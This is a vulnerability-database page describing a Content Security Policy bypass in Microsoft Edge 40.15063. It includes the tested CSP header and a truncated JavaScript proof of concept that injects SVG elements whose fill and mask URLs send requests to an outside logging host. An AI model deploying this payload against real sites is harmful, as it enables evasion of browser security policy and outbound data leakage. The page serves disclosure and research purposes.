|Edge Browsers CSP Bypass - VULHUB开源网络安全威胁库

Edge Browsers CSP Bypass

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

#### Microsoft Edge 40.15063 Version PoC: http://server.n0tr00t.com/test/edge3.php PiC: https://ws1.sinaimg.cn/large/c334041bgy1ffexx3u68oj20kq08rgma.jpg **CSP RULE:** ``` header("Content-Security-Policy: default-src 'none' 'unsafe-inline';"); ``` **Bypass:** ``` <script> (function(){ var x = document.body.appendChild(document.createElement("svg")); x.setAttribute("id", "n0tr00t"); x.setAttribute("xmlns", "http://www.w3.org/2000/svg"); /* fill & mask */ var svgNS = "http://www.w3.org/2000/svg"; var n0tr00t = document.getElementById('n0tr00t'); var fillurl = "url(http://csp32test2.edge.vqn3j8.ceye.io/fillbypass)"; var maskurl = "url(http://csp32test2.edge.vqn3j8.ceye.io/maskbypass)"; var nodeRect = n0tr00t.appendChild(document.createElementNS(svgNS, "rect")); nodeRect.setAttribute("height", 200); nodeRect.setAttribute("width", 200); nodeRect.setAttribute("fill", fillurl); nodeRect.setAttribute("stroke","#000000"); var nodeRect2 = n0tr00t.appendChild(document.createElementNS(svgNS,...

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™